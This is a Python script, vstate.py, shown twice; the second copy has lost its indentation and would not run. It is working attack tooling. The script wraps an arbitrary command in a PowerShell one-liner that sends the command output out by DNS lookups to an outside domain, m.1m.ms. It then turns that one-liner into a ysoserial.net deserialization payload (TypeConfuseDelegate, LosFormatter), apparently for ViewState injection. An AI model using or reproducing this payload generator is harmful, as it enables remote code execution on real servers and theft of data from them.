rwincey/vstate.py

## vstate.py
import subprocess
import base64
import gzip
import urllib.parse
import argparse

def gen_cmd(cmd_str):

    inner_powershell_cmd = '''$i="";$n=((1..2 |%%{'{0:X}' -f (Get-Random -Max 16)}) -join '');((iex "cmd /c %s") -join "`r`n").ToCharArray()|%%{$i+=[String]::Format("{0:X2}",[Convert]::ToUInt32($_[0]))};$m=0;for($j=0;$j -lt $i.Length; $j+=60){$l='';if($j+60 -lt $i.Length){$l=($i.substring($j, 60))}else{$l=($i.substring($j))}$l+="."+$m+"."+$n+".m.1m.ms"; nslookup "$l";$m+=1};$g="_._."+$n+".m.1m.ms"; nslookup "$g"''' % cmd_str
    #print(inner_powershell_cmd)

    # Write inner powershell
    f = open('cmd.txt', 'w')
    f.write(inner_powershell_cmd)
    f.close()

    # Write powershell encode script
    encode_script = '''$Text = Get-Content -Path 'cmd.txt';
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);
    $EncodedText =[Convert]::ToBase64String($Bytes);
    Write-Host $EncodedText'''

    #print(encode_script)
    power_cmd = 'powershell %s' % encode_script
    ret = subprocess.check_output(power_cmd)
    if len(ret) > 0:
        stripped = ret.decode().strip()

        # Create ysoserial cmd
        ysoserial_cmd = 'C:\\Users\\user\\Documents\\GitHub\\ysoserial.net\\ysoserial\\bin\\Release\\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter --rawcmd -c "powershell -e %s"' % stripped
        ret = subprocess.check_output(ysoserial_cmd)
        if len(ret) > 0:
            yso_stripped = ret.decode().strip()
            dec = base64.b64decode(yso_stripped)
            if len(dec) > 0:
                compressed_bytes = gzip.compress(dec)
                enc = base64.b64encode(compressed_bytes).decode()
                url_enc = urllib.parse.quote(enc, safe="")
                print(url_enc)

if __name__ == '__main__':

    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--cmd", help = "Command to run", required = True)
    args = parser.parse_args()

    cmd = args.cmd
    gen_cmd(cmd)
	import subprocess
	import base64
	import gzip
	import urllib.parse
	import argparse

	def gen_cmd(cmd_str):

	inner_powershell_cmd = '''$i="";$n=((1..2 \|%%{'{0:X}' -f (Get-Random -Max 16)}) -join '');((iex "cmd /c %s") -join "`r`n").ToCharArray()\|%%{$i+=[String]::Format("{0:X2}",[Convert]::ToUInt32($_[0]))};$m=0;for($j=0;$j -lt $i.Length; $j+=60){$l='';if($j+60 -lt $i.Length){$l=($i.substring($j, 60))}else{$l=($i.substring($j))}$l+="."+$m+"."+$n+".m.1m.ms"; nslookup "$l";$m+=1};$g="_._."+$n+".m.1m.ms"; nslookup "$g"''' % cmd_str
	#print(inner_powershell_cmd)

	# Write inner powershell
	f = open('cmd.txt', 'w')
	f.write(inner_powershell_cmd)
	f.close()

	# Write powershell encode script
	encode_script = '''$Text = Get-Content -Path 'cmd.txt';
	$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);
	$EncodedText =[Convert]::ToBase64String($Bytes);
	Write-Host $EncodedText'''

	#print(encode_script)
	power_cmd = 'powershell %s' % encode_script
	ret = subprocess.check_output(power_cmd)
	if len(ret) > 0:
	stripped = ret.decode().strip()

	# Create ysoserial cmd
	ysoserial_cmd = 'C:\\Users\\user\\Documents\\GitHub\\ysoserial.net\\ysoserial\\bin\\Release\\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter --rawcmd -c "powershell -e %s"' % stripped
	ret = subprocess.check_output(ysoserial_cmd)
	if len(ret) > 0:
	yso_stripped = ret.decode().strip()
	dec = base64.b64decode(yso_stripped)
	if len(dec) > 0:
	compressed_bytes = gzip.compress(dec)
	enc = base64.b64encode(compressed_bytes).decode()
	url_enc = urllib.parse.quote(enc, safe="")
	print(url_enc)

	if __name__ == '__main__':

	parser = argparse.ArgumentParser()
	parser.add_argument("-c", "--cmd", help = "Command to run", required = True)
	args = parser.parse_args()

	cmd = args.cmd
	gen_cmd(cmd)